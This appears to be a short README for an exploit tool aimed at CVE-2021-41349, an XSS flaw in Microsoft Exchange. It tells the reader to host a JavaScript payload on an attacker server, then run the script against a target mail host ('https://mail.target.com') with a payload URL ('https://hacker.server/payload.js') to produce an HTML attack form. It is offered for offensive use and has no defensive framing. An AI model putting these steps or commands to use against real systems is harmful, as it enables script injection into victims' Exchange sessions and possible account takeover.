Exploiting: CVE-2021-41349
This exploiting tool creates a Form for posting XSS Payload to the target Exchange server.
You need to create a js
containing your desire to do.
- Create Your
js
Payload and upload it somewhare. - run the
CVE-2021-41349.py
same as following steps.
python3 CVE-2021-41349.py "https://mail.target.com" "https://hacker.server/payload.js" out.html
or:
./CVE-2021-41349.py "https://mail.target.com" "https://hacker.server/payload.js" out.html
- Upload The
html
file into server. - Done! Test it!